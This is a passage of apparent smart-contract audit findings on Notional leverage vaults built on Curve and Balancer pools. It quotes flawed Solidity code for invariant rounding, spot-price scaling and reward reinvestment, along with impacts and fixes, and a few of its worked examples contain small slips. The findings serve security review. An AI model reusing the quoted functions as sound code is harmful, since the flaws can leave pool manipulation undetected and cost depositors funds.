becomes imbalanced (30%-70%) with 540 WETH and 1260 stETH.\\nAt T3, the vault re-enters the withdrawn tokens to the pool proportionally with 100 WETH and 100 stETH. Since the pool is already imbalanced, attempting to enter the pool proportionally (50% WETH and 50% stETH) will incur additional slippage and penalties, resulting in fewer LP tokens returned.\\nThis issue affects both Curve and Balancer pools since joining an imbalanced pool will always incur a loss.\\nExplantation of imbalance pool\\nA Curve pool is considered imbalanced when there is an imbalance between the assets within it. 
For instance, the Curve stETH/ETH pool is considered imbalanced if it has the following reserves:\\nETH: 340,472.34 (31.70%)\\nstETH: 733,655.65 (68.30%)\\nIf a Curve Pool is imbalanced, attempting to perform a proportional join will not give an optimal return (e.g. result in fewer Pool LP tokens received).\\nIn Curve Pool, there are penalties/bonuses when depositing to a pool. The pools are always trying to balance themselves. If a deposit helps the pool to reach that desired balance, a deposit bonus will be given (receive extra tokens). On the other hand, if a deposit deviates from the pool from the desired balance, a deposit penalty will be applied (receive fewer tokens).\\n```\\ndef add_liquidity(amounts: uint256[N_COINS], min_mint_amount: uint256) -> uint256:\\n..SNIP..\\n if token_supply > 0:\\n # Only account for fees if we are not the first to deposit\\n fee: uint256 = self.fee * N_COINS / (4 * (N_COINS - 1))\\n admin_fee: uint256 = self.admin_fee\\n for i in range(N_COINS):\\n ideal_balance: uint256 = D1 * old_balances[i] / D0\\n difference: uint256 = 0\\n if ideal_balance > new_balances[i]:\\n difference = ideal_balance - new_balances[i]\\n else:\\n difference = new_balances[i] - ideal_balance\\n fees[i] = fee * difference / FEE_DENOMINATOR\\n if admin_fee != 0:\\n self.admin_balances[i] += fees[i] * admin_fee / FEE_DENOMINATOR\\n new_balances[i] -= fees[i]\\n D2 = self.get_D(new_balances, amp)\\n mint_amount = token_supply * (D2 - D0) / D0\\n else:\\n mint_amount = D1 # Take the dust if there was any\\n..SNIP..\\n```\\n\\nFollowing is the mathematical explanation of the penalties/bonuses extracted from Curve's Discord channel:\\nThere is a “natural” amount of D increase that corresponds to a given total deposit amount; when the pool is perfectly balanced, this D increase is optimally achieved by a balanced deposit. 
Any other deposit proportions for the same total amount will give you less D.\\nHowever, when the pool is imbalanced, a balanced deposit is no longer optimal for the D increase.чConsider providing the callers the option to deposit the reward tokens in a \"non-proportional\" manner if a pool becomes imbalanced. For instance, the function could allow the caller to swap the withdrawn tokens in external DEXs within the `restoreVault` function to achieve the most optimal proportion to minimize the penalty and slippage when re-entering the pool. This is similar to the approach in the vault's reinvest function.чThere is no guarantee that a pool will always be balanced. Historically, there have been multiple instances where the largest curve pool (stETH/ETH) has become imbalanced (Reference #1 and #2).\\nIf the pool is imbalanced due to unexpected circumstances, performing a proportional deposit is not optimal, leading to the deposit resulting in fewer LP tokens than possible due to the deposit penalty or slippage due to internal swap.\\nThe side-effect is that the vault restoration will result in fewer pool tokens in return due to sub-optimal trade, eventually leading to a loss of assets for the vault shareholder.ч```\\nFile: SingleSidedLPVaultBase.sol\\n /// @notice Restores withdrawn tokens from emergencyExit back into the vault proportionally.\\n /// Unlocks the vault after restoration so that normal functionality is restored.\\n /// @param minPoolClaim slippage limit to prevent front running\\n function restoreVault(\\n uint256 minPoolClaim, bytes calldata /* data */\\n ) external override whenLocked onlyNotionalOwner {\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n\\n (IERC20[] memory tokens, /* */) = TOKENS();\\n uint256[] memory amounts = new uint256[](tokens.length);\\n\\n // All balances held by the vault are assumed to be used to re-enter\\n // the pool. 
Since the vault has been locked no other users should have\\n // been able to enter the pool.\\n for (uint256 i; i < tokens.length; i++) {\\n if (address(tokens[i]) == address(POOL_TOKEN())) continue;\\n amounts[i] = TokenUtils.tokenBalance(address(tokens[i]));\\n }\\n\\n // No trades are specified so this joins proportionally using the\\n // amounts specified.\\n uint256 poolTokens = _joinPoolAndStake(amounts, minPoolClaim);\\n..SNIP..\\n```\\n -Rounding differences when computing the invariantчhighчThe invariant is used to compute the spot price to verify if the pool has been manipulated before executing certain key vault actions (e.g. reinvest rewards). If the inputted invariant is inaccurate, the spot price computed might not be accurate and might not match the actual spot price of the Balancer Pool. In the worst-case scenario, it might potentially fail to detect the pool has been manipulated, and the trade proceeds to execute against the manipulated pool, leading to a loss of assets.\\nThe Balancer's Composable Pool codebase relies on the old version of the `StableMath._calculateInvariant` that allows the caller to specify if the computation should round up or down via the `roundUp` parameter.\\n```\\nFile: StableMath.sol\\n function _calculateInvariant(\\n uint256 amplificationParameter,\\n uint256[] memory balances,\\n bool roundUp\\n ) internal pure returns (uint256) {\\n /**********************************************************************************************\\n // invariant //\\n // D = invariant D^(n+1) //\\n // A = amplification coefficient A n^n S + D = A D n^n + ----------- //\\n // S = sum of balances n^n P //\\n // P = product of balances //\\n // n = number of tokens //\\n **********************************************************************************************/\\n\\n unchecked {\\n // We support rounding up or down.\\n uint256 sum = 0;\\n uint256 numTokens = balances.length;\\n for (uint256 i = 0; i < numTokens; i++) {\\n sum = 
sum.add(balances[i]);\\n }\\n if (sum == 0) {\\n return 0;\\n }\\n\\n uint256 prevInvariant = 0;\\n uint256 invariant = sum;\\n uint256 ampTimesTotal = amplificationParameter * numTokens;\\n\\n for (uint256 i = 0; i < 255; i++) {\\n uint256 P_D = balances[0] * numTokens;\\n for (uint256 j = 1; j < numTokens; j++) {\\n P_D = Math.div(Math.mul(Math.mul(P_D, balances[j]), numTokens), invariant, roundUp);\\n }\\n prevInvariant = invariant;\\n invariant = Math.div(\\n Math.mul(Math.mul(numTokens, invariant), invariant).add(\\n Math.div(Math.mul(Math.mul(ampTimesTotal, sum), P_D), _AMP_PRECISION, roundUp)\\n ),\\n Math.mul(numTokens + 1, invariant).add(\\n // No need to use checked arithmetic for the amp precision, the amp is guaranteed to be at least 1\\n Math.div(Math.mul(ampTimesTotal - _AMP_PRECISION, P_D), _AMP_PRECISION, !roundUp)\\n ),\\n roundUp\\n );\\n\\n if (invariant > prevInvariant) {\\n if (invariant - prevInvariant <= 1) {\\n return invariant;\\n }\\n } else if (prevInvariant - invariant <= 1) {\\n return invariant;\\n }\\n }\\n }\\n\\n revert CalculationDidNotConverge();\\n }\\n```\\n\\nWithin the `BalancerSpotPrice._calculateStableMathSpotPrice` function, the `StableMath._calculateInvariant` is computed rounding up per Line 90 below\\n```\\nFile: BalancerSpotPrice.sol\\n function _calculateStableMathSpotPrice(\\n uint256 ampParam,\\n uint256[] memory scalingFactors,\\n uint256[] memory balances,\\n uint256 scaledPrimary,\\n uint256 primaryIndex,\\n uint256 index2\\n ) internal pure returns (uint256 spotPrice) {\\n // Apply scale factors\\n uint256 secondary = balances[index2] * scalingFactors[index2] / BALANCER_PRECISION;\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n ampParam, StableMath._balances(scaledPrimary, secondary), true // round up\\n );\\n```\\n\\nThe new Composable Pool contract uses a newer version of the StableMath library where the `StableMath._calculateInvariant` function always rounds down. 
Following is the StableMath.sol of one of the popular composable pools in Arbitrum that uses the new StableMath library\\n```\\nfunction _calculateInvariant(uint256 amplificationParameter, uint256[] memory balances)\\n internal\\n pure\\n returns (uint256)\\n{\\n /**********************************************************************************************\\n // invariant //\\n // D = invariant D^(n+1) //\\n // A = amplification coefficient A n^n S + D = A D n^n + ----------- //\\n // S = sum of balances n^n P //\\n // P = product of balances //\\n // n = number of tokens //\\n **********************************************************************************************/\\n\\n // Always round down, to match Vyper's arithmetic (which always truncates).\\n ..SNIP..\\n```\\n\\nThus, Notional rounds up when calculating the invariant, while Balancer's Composable Pool rounds down when calculating the invariant. This inconsistency will result in a different invariantчTo avoid any discrepancy in the result, ensure that the StableMath library used by Balancer's Composable Pool and Notional's leverage vault are aligned, and the implementation of the StableMath functions is the same between them.чThe invariant is used to compute the spot price to verify if the pool has been manipulated before executing certain key vault actions (e.g. reinvest rewards). If the inputted invariant is inaccurate, the spot price computed might not be accurate and might not match the actual spot price of the Balancer Pool. 
In the worst-case scenario, it might potentially fail to detect the pool has been manipulated, and the trade proceeds to execute against the manipulated pool, leading to a loss of assets.ч```\\nFile: StableMath.sol\\n function _calculateInvariant(\\n uint256 amplificationParameter,\\n uint256[] memory balances,\\n bool roundUp\\n ) internal pure returns (uint256) {\\n /**********************************************************************************************\\n // invariant //\\n // D = invariant D^(n+1) //\\n // A = amplification coefficient A n^n S + D = A D n^n + ----------- //\\n // S = sum of balances n^n P //\\n // P = product of balances //\\n // n = number of tokens //\\n **********************************************************************************************/\\n\\n unchecked {\\n // We support rounding up or down.\\n uint256 sum = 0;\\n uint256 numTokens = balances.length;\\n for (uint256 i = 0; i < numTokens; i++) {\\n sum = sum.add(balances[i]);\\n }\\n if (sum == 0) {\\n return 0;\\n }\\n\\n uint256 prevInvariant = 0;\\n uint256 invariant = sum;\\n uint256 ampTimesTotal = amplificationParameter * numTokens;\\n\\n for (uint256 i = 0; i < 255; i++) {\\n uint256 P_D = balances[0] * numTokens;\\n for (uint256 j = 1; j < numTokens; j++) {\\n P_D = Math.div(Math.mul(Math.mul(P_D, balances[j]), numTokens), invariant, roundUp);\\n }\\n prevInvariant = invariant;\\n invariant = Math.div(\\n Math.mul(Math.mul(numTokens, invariant), invariant).add(\\n Math.div(Math.mul(Math.mul(ampTimesTotal, sum), P_D), _AMP_PRECISION, roundUp)\\n ),\\n Math.mul(numTokens + 1, invariant).add(\\n // No need to use checked arithmetic for the amp precision, the amp is guaranteed to be at least 1\\n Math.div(Math.mul(ampTimesTotal - _AMP_PRECISION, P_D), _AMP_PRECISION, !roundUp)\\n ),\\n roundUp\\n );\\n\\n if (invariant > prevInvariant) {\\n if (invariant - prevInvariant <= 1) {\\n return invariant;\\n }\\n } else if (prevInvariant - invariant <= 1) {\\n return 
invariant;\\n }\\n }\\n }\\n\\n revert CalculationDidNotConverge();\\n }\\n```\\n -Incorrect scaling of the spot priceчhighчThe incorrect scaling of the spot price leads to the incorrect spot price, which is later compared with the oracle price.\\nIf the spot price is incorrect, it might potentially fail to detect the pool has been manipulated or result in unintended reverts due to false positives. In the worst-case scenario, the trade proceeds to execute against the manipulated pool, leading to a loss of assets.\\nPer the comment and source code at Lines 97 to 103, the `SPOT_PRICE.getComposableSpotPrices` is expected to return the spot price in native decimals.\\n```\\nFile: BalancerComposableAuraVault.sol\\n function _checkPriceAndCalculateValue() internal view override returns (uint256) {\\n (uint256[] memory balances, uint256[] memory spotPrices) = SPOT_PRICE.getComposableSpotPrices(\\n BALANCER_POOL_ID,\\n address(BALANCER_POOL_TOKEN),\\n PRIMARY_INDEX()\\n );\\n\\n // Spot prices are returned in native decimals, convert them all to POOL_PRECISION\\n // as required in the _calculateLPTokenValue method.\\n (/* */, uint8[] memory decimals) = TOKENS();\\n for (uint256 i; i < spotPrices.length; i++) {\\n spotPrices[i] = spotPrices[i] * POOL_PRECISION() / 10 ** decimals[i];\\n }\\n\\n return _calculateLPTokenValue(balances, spotPrices);\\n }\\n```\\n\\nWithin the `getComposableSpotPrices` function, it will trigger the `_calculateStableMathSpotPrice` function. 
When the primary and secondary balances are passed into the `StableMath._calculateInvariant` and `StableMath._calcSpotPrice` functions, they are scaled up to 18 decimals precision as StableMath functions only work with balances that have been normalized to 18 decimals.\\nAssuming that the following states:\\nPrimary Token = USDC (6 decimals)\\nSecondary Token = DAI (18 decimals)\\nPrimary Balance = 100 USDC (=100 * 1e6)\\nSecondary Balance = 100 DAI (=100 * 1e18)\\nscalingFactors[USDC] = 1e12 * Fixed.ONE (1e18) = 1e30\\nscalingFactors[DAI] = 1e0 * Fixed.ONE (1e18) = 1e18\\nThe price between USDC and DAI is 1:1\\nAfter scaling the primary and secondary balances, the scaled balances will be as follows:\\n```\\nscaledPrimary = balances[USDC] * scalingFactors[USDC] / BALANCER_PRECISION\\nscaledPrimary = 100 * 1e6 * 1e30 / 1e18\\nscaledPrimary = 100 * 1e18\\n\\nscaledSecondary = balances[DAI] * scalingFactors[DAI] / BALANCER_PRECISION\\nscaledSecondary = 100 * 1e18 * 1e18 / 1e18\\nscaledSecondary = 100 * 1e18\\n```\\n\\nThe spot price returned from the `StableMath._calcSpotPrice` function at Line 93 will be `1e18` (1:1).\\n```\\nFile: BalancerSpotPrice.sol\\n function _calculateStableMathSpotPrice(\\n uint256 ampParam,\\n uint256[] memory scalingFactors,\\n uint256[] memory balances,\\n uint256 scaledPrimary,\\n uint256 primaryIndex,\\n uint256 index2\\n ) internal pure returns (uint256 spotPrice) {\\n // Apply scale factors\\n uint256 secondary = balances[index2] * scalingFactors[index2] / BALANCER_PRECISION;\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n ampParam, StableMath._balances(scaledPrimary, secondary), true // round up\\n );\\n\\n spotPrice = StableMath._calcSpotPrice(ampParam, invariant, scaledPrimary, secondary);\\n\\n // Remove scaling factors from spot price\\n spotPrice = spotPrice * scalingFactors[primaryIndex] / scalingFactors[index2];\\n }\\n```\\n\\nSubsequently, in Line 96 above, the code attempts to remove the scaling factor from the 
spot price (1e18).\\n```\\nspotPrice = spotPrice * scalingFactors[USDC] / scalingFactors[DAI];\\nspotPrice = 1e18 * 1e30 / 1e18\\nspotPrice = 1e30\\nspotPrice = 1e12 * 1e18\\n```\\n\\nThe `spotPrice[DAI-Secondary]` is not denominated in native precision after the scaling. The `SPOT_PRICE.getComposableSpotPrices` will return the following spot prices:\\n```\\nspotPrice[USDC-Primary] = 0\\nspotPrice[DAI-Secondary] = 1e12 * 1e18\\n```\\n\\nThe returned spot prices will be scaled to POOL_PRECISION (1e18). After the scaling, the spot price remains the same:\\n```\\nspotPrice[DAI-Secondary] = spotPrice[DAI-Secondary] * POOL_PRECISION / DAI_Decimal\\nspotPrice[DAI-Secondary] = 1e12 * 1e18 * 1e18 / 1e18\\nspotPrice[DAI-Secondary] = 1e12 * 1e18\\n```\\n\\nThe converted spot prices will be passed into the `_calculateLPTokenValue` function. Within the `_calculateLPTokenValue` function, the oracle price for DAI<>USDC will be `1e18`. From here, the `spotPrice[DAI-Secondary]` (1e12 * 1e18) is significantly different from the oracle price (1e18), which will cause the pool manipulation check to revert.\\n```\\nFile: BalancerComposableAuraVault.sol\\n function _checkPriceAndCalculateValue() internal view override returns (uint256) {\\n (uint256[] memory balances, uint256[] memory spotPrices) = SPOT_PRICE.getComposableSpotPrices(\\n BALANCER_POOL_ID,\\n address(BALANCER_POOL_TOKEN),\\n PRIMARY_INDEX()\\n );\\n\\n // Spot prices are returned in native decimals, convert them all to POOL_PRECISION\\n // as required in the _calculateLPTokenValue method.\\n (/* */, uint8[] memory decimals) = TOKENS();\\n for (uint256 i; i < spotPrices.length; i++) {\\n spotPrices[i] = spotPrices[i] * POOL_PRECISION() / 10 ** decimals[i];\\n }\\n\\n return _calculateLPTokenValue(balances, spotPrices);\\n }\\n```\\nчThe spot price returned from `StableMath._calcSpotPrice` is denominated in 1e18 (POOL_PRECISION) since the inputted balances are normalized to 18 decimals. 
The scaling factors are used to normalize a balance to 18 decimals. By dividing or scaling down the spot price by the scaling factor, the native spot price will be returned.\\n```\\nspotPrice[DAI-Secondary] = spotPrice[DAI-Secondary] * Fixed.ONE / scalingFactors[DAI];\\nspotPrice = 1e18 * Fixed.ONE / (1e0 * Fixed.ONE)\\nspotPrice = 1e18 * 1e18 / (1e0 * 1e18)\\nspotPrice = 1e18\\n```\\nчThe spot price is used to verify if the pool has been manipulated before executing certain key vault actions (e.g. reinvest rewards).\\nIf the spot price is incorrect, it might potentially result in the following:\\nFailure to detect the pool has been manipulated, resulting in the trade to execute against the manipulated pool, leading to a loss of assets.\\nUnintended reverts due to false positives, breaking core functionalities of the protocol that rely on the `_checkPriceAndCalculateValue` function.\\nThe affected `_checkPriceAndCalculateValue` function was found to be used within the following functions:\\n`reinvestReward` - If the `_checkPriceAndCalculateValue` function is malfunctioning or reverts unexpectedly, the protocol will not be able to reinvest, leading to a loss of value for the vault shareholders.\\n`convertStrategyToUnderlying` - This function is used by Notional V3 for the purpose of computing the collateral values and the account's health factor. If the `_checkPriceAndCalculateValue` function reverts unexpectedly due to an incorrect invariant/spot price, many of Notional's core functions will break. 
In addition, the collateral values and the account's health factor might be inflated if it fails to detect a manipulated pool due to incorrect invariant/spot price, potentially allowing the malicious actors to drain the main protocol.ч```\\nFile: BalancerComposableAuraVault.sol\\n function _checkPriceAndCalculateValue() internal view override returns (uint256) {\\n (uint256[] memory balances, uint256[] memory spotPrices) = SPOT_PRICE.getComposableSpotPrices(\\n BALANCER_POOL_ID,\\n address(BALANCER_POOL_TOKEN),\\n PRIMARY_INDEX()\\n );\\n\\n // Spot prices are returned in native decimals, convert them all to POOL_PRECISION\\n // as required in the _calculateLPTokenValue method.\\n (/* */, uint8[] memory decimals) = TOKENS();\\n for (uint256 i; i < spotPrices.length; i++) {\\n spotPrices[i] = spotPrices[i] * POOL_PRECISION() / 10 ** decimals[i];\\n }\\n\\n return _calculateLPTokenValue(balances, spotPrices);\\n }\\n```\\n -Incorrect Spot PriceчhighчMultiple discrepancies between the implementation of Leverage Vault's `_calcSpotPrice` function and SDK were observed, which indicate that the computed spot price is incorrect.\\nIf the spot price is incorrect, it might potentially fail to detect the pool has been manipulated. 
In the worst-case scenario, the trade proceeds to execute against the manipulated pool, leading to a loss of assets.\\nThe `BalancerSpotPrice._calculateStableMathSpotPrice` function relies on the `StableMath._calcSpotPrice` to compute the spot price of two tokens.\\n```\\nFile: BalancerSpotPrice.sol\\n function _calculateStableMathSpotPrice(\\n..SNIP..\\n // Apply scale factors\\n uint256 secondary = balances[index2] * scalingFactors[index2] / BALANCER_PRECISION;\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n ampParam, StableMath._balances(scaledPrimary, secondary), true // round up\\n );\\n\\n spotPrice = StableMath._calcSpotPrice(ampParam, invariant, scaledPrimary, secondary);\\n```\\n\\n```\\nFile: StableMath.sol\\n /**\\n * @dev Calculates the spot price of token Y in token X.\\n */\\n function _calcSpotPrice(\\n uint256 amplificationParameter,\\n uint256 invariant, \\n uint256 balanceX,\\n uint256 balanceY\\n ) internal pure returns (uint256) {\\n /**************************************************************************************************************\\n // //\\n // 2.a.x.y + a.y^2 + b.y //\\n // spot price Y/X = - dx/dy = ----------------------- //\\n // 2.a.x.y + a.x^2 + b.x //\\n // //\\n // n = 2 //\\n // a = amp param * n //\\n // b = D + a.(S - D) //\\n // D = invariant //\\n // S = sum of balances but x,y = 0 since x and y are the only tokens //\\n **************************************************************************************************************/\\n\\n unchecked {\\n uint256 a = (amplificationParameter * 2) / _AMP_PRECISION;\\n uint256 b = Math.mul(invariant, a).sub(invariant);\\n\\n uint256 axy2 = Math.mul(a * 2, balanceX).mulDown(balanceY); // n = 2\\n\\n // dx = a.x.y.2 + a.y^2 - b.y\\n uint256 derivativeX = axy2.add(Math.mul(a, balanceY).mulDown(balanceY)).sub(b.mulDown(balanceY));\\n\\n // dy = a.x.y.2 + a.x^2 - b.x\\n uint256 derivativeY = axy2.add(Math.mul(a, 
balanceX).mulDown(balanceX)).sub(b.mulDown(balanceX));\\n\\n // The rounding direction is irrelevant as we're about to introduce a much larger error when converting to log\\n // space. We use `divUp` as it prevents the result from being zero, which would make the logarithm revert. A\\n // result of zero is therefore only possible with zero balances, which are prevented via other means.\\n return derivativeX.divUp(derivativeY);\\n }\\n }\\n```\\n\\nOn a high level, the spot price is computed by determining the pool derivatives. The Balancer SDK's provide a feature to compute the spot price of any two tokens within a pool, and it leverages the `_poolDerivatives` function.\\nThe existing function for computing the spot price of any two tokens of a composable pool has the following errors or discrepancies from the approach used to compute the spot price in Balancer SDK, which might lead to an inaccurate spot price being computed.\\nInstance 1\\nThe comments and SDK add `b.y` and `b.x` to the numerator and denominator, respectively, in the formula. However, the code performs a subtraction.\\nInstance 2\\nPer the comment and SDK code, $b = (S - D) a + D$.\\nHowever, assuming that $S$ is zero (for a two-token pool), the following code in the Leverage Vault to compute $b$ is not equivalent to the above.\\n```\\nuint256 b = Math.mul(invariant, a).sub(invariant);\\n```\\n\\nInstance 3\\nThe $S$ in the code will always be zero because the code is catered only for two-token pools. However, for a composable pool, it can support up to five (5) tokens in a pool. $S$ should be as follows, where $balances$ is all the tokens in a composable pool except for BPT.\\n$$ S = \\sum_{i \\neq \\text{tokenIndexIn}, i \\neq \\text{tokenIndexOut}} \\text{balances}[i] $$\\nInstance 4\\nInstance 5\\nPer SDK, the amplification factor is scaled down by $n^{(n - 1)}$ where $n$ is the number of tokens in a composable pool (excluding BPT). 
Otherwise, this was not implemented within the code.чGiven multiple discrepancies between the implementation of Leverage Vault's `_calcSpotPrice` function and SDK and due to the lack of information on the web, it is recommended to reach out to the Balancer's protocol team to identify the actual formula used to determine a spot price of any two tokens within a composable pool and check out if the formula in the SDK is up-to-date to be used against the composable pool.\\nIt is also recommended to implement additional tests to ensure that the `_calcSpotPrice` returns the correct spot price of composable pools.\\nIn addition, the `StableMath._calcSpotPrice` function is no longer used or found within the current version of Balancer's composable pool. Thus, there is no guarantee that the math within the `StableMath._calcSpotPrice` works with the current implementation. It is recommended to use the existing method in the current Composable Pool's StableMath, such as `_calcOutGivenIn` (ensure the fee is excluded) to compute the spot price.чThe spot price is used to verify if the pool has been manipulated before executing certain key vault actions (e.g. reinvest rewards). If the spot price is incorrect, it might potentially fail to detect the pool has been manipulated or result in unintended reverts due to false positives. 
In the worst-case scenario, the trade proceeds to execute against the manipulated pool, leading to a loss of assets.ч```\\nFile: BalancerSpotPrice.sol\\n function _calculateStableMathSpotPrice(\\n..SNIP..\\n // Apply scale factors\\n uint256 secondary = balances[index2] * scalingFactors[index2] / BALANCER_PRECISION;\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n ampParam, StableMath._balances(scaledPrimary, secondary), true // round up\\n );\\n\\n spotPrice = StableMath._calcSpotPrice(ampParam, invariant, scaledPrimary, secondary);\\n```\\n -Incorrect invariant used for Balancer's composable poolsчhighчOnly two balances instead of all balances were used when computing the invariant for Balancer's composable pools, which is incorrect. As a result, pool manipulation might not be detected. This could lead to the transaction being executed on the manipulated pool, resulting in a loss of assets.\\n```\\nFile: BalancerSpotPrice.sol\\n function _calculateStableMathSpotPrice(\\n..SNIP..\\n // Apply scale factors\\n uint256 secondary = balances[index2] * scalingFactors[index2] / BALANCER_PRECISION;\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n ampParam, StableMath._balances(scaledPrimary, secondary), true // round up\\n );\\n\\n spotPrice = StableMath._calcSpotPrice(ampParam, invariant, scaledPrimary, secondary);\\n..SNIP..\\n```\\n\\nA composable pool can support up to 5 tokens (excluding the BPT). When computing the invariant for a composable pool, one needs to pass in the balances of all the tokens within the pool except for BPT. However, the existing code always only passes in the balance of two tokens, which will return an incorrect invariant if the composable pool supports more than two tokens.\\nFollowing is the formula for computing the invariant of a composable pool taken from Balancer's Composable Pool. 
The `balances` passed into this function consist of all `balances` except for BPT (Reference)\\n```\\nfunction _calculateInvariant(uint256 amplificationParameter, uint256[] memory balances)\\n internal\\n pure\\n returns (uint256)\\n{\\n /**********************************************************************************************\\n // invariant //\\n // D = invariant D^(n+1) //\\n // A = amplification coefficient A n^n S + D = A D n^n + ----------- //\\n // S = sum of balances n^n P //\\n // P = product of balances //\\n // n = number of tokens //\\n **********************************************************************************************/\\n```\\n\\nWithin the `_poolDerivatives` function, the `balances` used to compute the invariant consist of the balance of all tokens in the pool, except for BPT, which is aligned with the earlier understanding.\\n```\\nexport function _poolDerivatives(\\n A: BigNumber,\\n balances: OldBigNumber[],\\n tokenIndexIn: number,\\n tokenIndexOut: number,\\n is_first_derivative: boolean,\\n wrt_out: boolean\\n): OldBigNumber {\\n const totalCoins = balances.length;\\n const D = _invariant(A, balances);\\n```\\nчReview if there is any specific reason for passing in only the balance of two tokens when computing the invariant. Otherwise, the balance of all tokens (except BPT) should be used to compute the invariant.\\nIn addition, it is recommended to include additional tests to ensure that the computed spot price is aligned with the market price.чAn incorrect invariant will lead to an incorrect spot price being computed. The spot price is used within the `_checkPriceAndCalculateValue` function that is intended to revert if the spot price on the pool is not within some deviation tolerance of the implied oracle price to prevent any pool manipulation. 
As a result, incorrect spot price leads to false positives or false negatives, where, in the worst-case scenario, pool manipulation was not caught by this function, and the transaction proceeded to be executed.\\nThe `_checkPriceAndCalculateValue` function was found to be used within the following functions:\\n`reinvestReward` - If the `_checkPriceAndCalculateValue` function is malfunctioning, it will cause the vault to add liquidity into a pool that has been manipulated, leading to a loss of assets.\\n`convertStrategyToUnderlying` - This function is used by Notional V3 for the purpose of computing the collateral values and the account's health factor. If the `_checkPriceAndCalculateValue` function reverts unexpectedly due to an incorrect invariant/spot price, many of Notional's core functions will break. In addition, the collateral values and the account's health factor might be inflated if it fails to detect a manipulated pool due to incorrect invariant/spot price, potentially allowing the malicious actors to drain the main protocol.ч```\\nFile: BalancerSpotPrice.sol\\n function _calculateStableMathSpotPrice(\\n..SNIP..\\n // Apply scale factors\\n uint256 secondary = balances[index2] * scalingFactors[index2] / BALANCER_PRECISION;\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n ampParam, StableMath._balances(scaledPrimary, secondary), true // round up\\n );\\n\\n spotPrice = StableMath._calcSpotPrice(ampParam, invariant, scaledPrimary, secondary);\\n..SNIP..\\n```\\n -Unable to reinvest if the reward token equals one of the pool tokensчhighчIf the reward token is the same as one of the pool tokens, the protocol would not be able to reinvest such a reward token. Thus leading to a loss of assets for the vault shareholders.\\nDuring the reinvestment process, the `reinvestReward` function will be executed once for each reward token. 
The length of the `trades` listing defined in the payload must be the same as the number of tokens in the pool per Line 339 below.\\n```\\nFile: SingleSidedLPVaultBase.sol\\n function reinvestReward(\\n SingleSidedRewardTradeParams[] calldata trades,\\n uint256 minPoolClaim\\n ) external whenNotLocked onlyRole(REWARD_REINVESTMENT_ROLE) returns (\\n address rewardToken,\\n uint256 amountSold,\\n uint256 poolClaimAmount\\n ) {\\n // Will revert if spot prices are not in line with the oracle values\\n _checkPriceAndCalculateValue();\\n\\n // Require one trade per token, if we do not want to buy any tokens at a\\n // given index then the amount should be set to zero. This applies to pool\\n // tokens like in the ComposableStablePool.\\n require(trades.length == NUM_TOKENS());\\n uint256[] memory amounts;\\n (rewardToken, amountSold, amounts) = _executeRewardTrades(trades);\\n```\\n\\nIn addition, due to the requirement at Line 105, each element in the `trades` listing must be a token within a pool and must be ordered in sequence according to the token index of the pool.\\n```\\nFile: StrategyUtils.sol\\n function executeRewardTrades(\\n IERC20[] memory tokens,\\n SingleSidedRewardTradeParams[] calldata trades,\\n address rewardToken,\\n address poolToken\\n ) external returns(uint256[] memory amounts, uint256 amountSold) {\\n amounts = new uint256[](trades.length);\\n for (uint256 i; i < trades.length; i++) {\\n // All trades must sell the same token.\\n require(trades[i].sellToken == rewardToken);\\n // Bypass certain invalid trades\\n if (trades[i].amount == 0) continue;\\n if (trades[i].buyToken == poolToken) continue;\\n\\n // The reward trade can only purchase tokens that go into the pool\\n require(trades[i].buyToken == address(tokens[i]));\\n```\\n\\nAssuming the TriCRV Curve pool (crvUSD+WETH+CRV) has two reward tokens (CRV & CVX). 
This example is taken from a live Curve pool on Ethereum (Reference 1 Reference 2)\\nThe pool will consist of the following tokens:\\n```\\ntokens[0] = crvUSD\\ntokens[1] = WETH\\ntokens[2] = CRV\\n```\\n\\nThus, if the protocol receives 3000 CVX reward tokens and it intends to sell 1000 CVX for crvUSD and 1000 CVX for WETH.\\nThe `trades` list has to be defined as below.\\n```\\ntrades[0].sellToken[0] = CRV (rewardToken) | trades[0].buyToken = crvUSD | trades[0].amount = 1000\\ntrades[1].sellToken[1] = CRV (rewardToken) | trades[1].buyToken = WETH | trades[0].amount = 1000\\ntrades[1].sellToken[2] = CRV (rewardToken) | trades[1].buyToken = CRV | trades[0].amount = 0\\n```\\n\\nThe same issue also affects the Balancer pools. Thus, the example is omitted for brevity. One of the affected Balancer pools is as follows, where the reward token is also one of the pool tokens.\\nWETH-AURA - Reference 1 Reference 2 (Reward Tokens = [BAL, AURA])\\nHowever, the issue is that the `_isInvalidRewardToken` function within the `_executeRewardTrades` will always revert.\\n```\\nFile: SingleSidedLPVaultBase.sol\\n function _executeRewardTrades(SingleSidedRewardTradeParams[] calldata trades) internal returns (\\n address rewardToken,\\n uint256 amountSold,\\n uint256[] memory amounts\\n ) {\\n // The sell token on all trades must be the same (checked inside executeRewardTrades) so\\n // just validate here that the sellToken is a valid reward token (i.e. none of the tokens\\n // used in the regular functioning of the vault).\\n rewardToken = trades[0].sellToken;\\n if (_isInvalidRewardToken(rewardToken)) revert Errors.InvalidRewardToken(rewardToken);\\n (IERC20[] memory tokens, /* */) = TOKENS();\\n (amounts, amountSold) = StrategyUtils.executeRewardTrades(\\n tokens, trades, rewardToken, address(POOL_TOKEN())\\n );\\n }\\n```\\n\\nThe reason is that within the `_isInvalidRewardToken` function it checks if the reward token to be sold is any of the pool tokens. 
